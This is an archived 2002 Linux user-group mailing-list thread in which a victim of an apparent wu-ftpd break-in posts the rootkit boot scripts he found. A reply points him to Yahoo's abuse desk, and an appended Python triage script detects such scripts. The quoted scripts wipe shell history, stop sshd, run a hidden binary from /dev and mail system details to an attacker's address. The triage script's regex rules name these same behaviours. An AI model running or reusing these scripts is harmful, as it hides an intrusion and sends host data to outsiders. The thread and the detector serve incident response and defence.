[lug] i got hacked

D. Stimits stimits at idcomm.com
Thu Apr 18 18:38:03 MDT 2002


j davis wrote:
> 
> yahoo,
> i got hacked and they're sending info to a yahoo account.....ryz_ro at yahoo.com
> look below....

Hope you actually sent it to abuse at yahoo.com; this one went to BLUG. Do
be certain to mention it was a criminal break-in, and that logs and data
should be preserved for police inquiries.

D. Stimits, stimits at idcomm.com

> 
> >From: "j davis" <davis_compz at hotmail.com>
> >Reply-To: lug at lug.boulder.co.us
> >To: lug at lug.boulder.co.us
> >Subject: [lug] i got hacked
> >Date: Thu, 18 Apr 2002 21:44:09 +0000
> >
> >
> >i have a box at a place i do contract work about 2 days a month.
> >today i could not ssh to it. so i went on site and discovered i got
> >hacked...like a dummy i didn't have tcp wrappers on or a firewall. i think
> >they exploited wu-ftpd
> >..i use redhat 7.1 with wu-ftpd 2.6.1-20...i haven't got around to upgrading
> >yet.
> >anyway here is what i found in /etc/rc3.d/S52remote
> >
> >#!/bin/sh
> >
> >rm -rf /root/.bash_history
> >ln -s /dev/null /root/.bash_history
> >
> >cd /dev
> >./ryz -f ./s
> >/etc/rc.d/init.d/sshd stop
> >cd /
> >
> >/usr/bin/trimite
> >
> >then here is /usr/bin/trimite
> >
> >#!/bin/sh
> >
> >echo "* Info : $(uname -a)" >> /tmp/info
> >echo "* Hostname : $(hostname -f)" >> /tmp/info
> >echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> >echo "* Uptime : $(uptime)" >> /tmp/info
> >echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> >echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> >echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> >echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> >echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> >echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> >echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> >echo "* Portul rootkitului este 25897" >> /tmp/info
> >cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> >rm -f /tmp/info
> >
> >so, netstat says i have something listening on 25897...what should i do?!
> >never been hacked before....i already turned off ftp and turned on tcp
> >wrappers.
> >
> >help please
> >jd
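
One defender-side way to triage boot scripts like the S52remote and trimite ones quoted above: an added example for this archive page, not code from the original post. The sample inputs are constructed copies of the two posted scripts with the mail address replaced by a placeholder; the rule names are my own.

```python
import re

# Constructed sample inputs: copies of the two scripts quoted in the post (mail address replaced).
SAMPLE_RC_SCRIPT = """#!/bin/sh

rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history

cd /dev
./ryz -f ./s
/etc/rc.d/init.d/sshd stop
cd /

/usr/bin/trimite
"""

SAMPLE_TRIMITE = """#!/bin/sh
echo "* Info : $(uname -a)" >> /tmp/info
echo "* Portul rootkitului este 25897" >> /tmp/info
cat /tmp/info | mail -s "root dupa reboot" attacker@example.com
rm -f /tmp/info
"""

# Per-line indicators, each derived from a behaviour visible in the posted scripts.
RULES = [
    ("history_wipe",   re.compile(r"\brm\s+-\w*\s+\S*\.bash_history\b")),       # anti-forensics
    ("history_nulled", re.compile(r"\bln\s+-s\s+/dev/null\s+\S*\.bash_history\b")),
    ("service_stop",   re.compile(r"/etc/rc\.d/init\.d/\w+\s+stop\b")),         # real daemon replaced
    ("exfil_mail",     re.compile(r"\|\s*mail\s+-s\b")),                         # recon mailed out
]

def triage_init_script(text):
    """Return (rule, line number, line) for every suspicious line in a boot script."""
    findings = []
    cwd_is_dev = False  # track 'cd /dev': rootkits hide binaries among device nodes
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if re.fullmatch(r"cd\s+/dev/?", line):
            cwd_is_dev = True
        elif re.fullmatch(r"cd\s+\S+", line):
            cwd_is_dev = False
        if cwd_is_dev and line.startswith("./"):   # relative executable run from /dev
            findings.append(("exec_from_dev", lineno, line))
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((name, lineno, line))
    return findings
```

Run it over every file in /etc/rc.d before the box is rebuilt, and keep the originals (and the listener's process image) for the police inquiry the reply above mentions.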
